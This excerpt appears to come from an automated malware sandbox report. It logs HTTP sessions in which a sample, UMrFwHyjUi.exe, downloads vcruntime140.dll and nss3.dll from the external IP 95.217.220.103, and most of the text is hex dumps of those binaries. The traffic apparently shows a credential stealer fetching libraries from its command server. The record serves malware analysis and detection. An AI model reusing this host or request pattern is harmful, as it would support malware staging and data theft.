                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC16384INData Raw: 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01
                                                                                                                                                                                                                          Data Ascii: ^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                                                                                                                          2024-10-23 15:06:15 UTC16384INData Raw: 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00
                                                                                                                                                                                                                          Data Ascii: twu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                                                                                                                          2024-10-23 15:06:16 UTC16384INData Raw: 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84
                                                                                                                                                                                                                          Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                                                                                                                          2024-10-23 15:06:16 UTC16384INData Raw: 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff
                                                                                                                                                                                                                          Data Ascii: @]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                                                                                                                          2024-10-23 15:06:16 UTC16384INData Raw: eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb
                                                                                                                                                                                                                          Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          16192.168.2.44987495.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:18 UTC203OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:18 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:18 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 80880
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Last-Modified: Wednesday, 23-Oct-2024 15:06:18 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          2024-10-23 15:06:18 UTC16122INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                                                                                                                          2024-10-23 15:06:18 UTC16384INData Raw: 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46
                                                                                                                                                                                                                          Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
                                                                                                                                                                                                                          2024-10-23 15:06:18 UTC16384INData Raw: 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8
                                                                                                                                                                                                                          Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
                                                                                                                                                                                                                          2024-10-23 15:06:18 UTC16384INData Raw: 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d
                                                                                                                                                                                                                          Data Ascii: ttt@++t+t+u+uQ<0|*<9&w/c5~bASJCtv
                                                                                                                                                                                                                          2024-10-23 15:06:18 UTC15606INData Raw: 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72
                                                                                                                                                                                                                          Data Ascii: NT@L|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicr


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          17192.168.2.44988695.217.220.1034435768C:\Users\user\Desktop\UMrFwHyjUi.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-10-23 15:06:20 UTC195OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                          Host: 95.217.220.103
                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2024-10-23 15:06:20 UTC264INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:06:20 GMT
                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                          Content-Length: 2046288
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Last-Modified: Wednesday, 23-Oct-2024 15:06:20 GMT
                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                          2024-10-23 15:06:20 UTC16120INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                          2024-10-23 15:06:20 UTC16384INData Raw: ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41
                                                                                                                                                                                                                          Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MA
                                                                                                                                                                                                                          2024-10-23 15:06:20 UTC16384INData Raw: 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b
                                                                                                                                                                                                                          Data Ascii: hRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$
                                                                                                                                                                                                                          2024-10-23 15:06:20 UTC16384INData Raw: 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e
                                                                                                                                                                                                                          Data Ascii: w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                                                                                                                                                                          2024-10-23 15:06:20 UTC16384INData Raw: ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14
                                                                                                                                                                                                                          Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                                                                                                                                                                          2024-10-23 15:06:21 UTC16384INData Raw: 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68
                                                                                                                                                                                                                          Data Ascii: $%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                                                                                                                                                                          2024-10-23 15:06:21 UTC16384INData Raw: 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08
                                                                                                                                                                                                                          Data Ascii: Fd8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                                                                                                                          2024-10-23 15:06:21 UTC16384INData Raw: e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9
                                                                                                                                                                                                                          Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-M
                                                                                                                                                                                                                          2024-10-23 15:06:21 UTC16384INData Raw: 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83
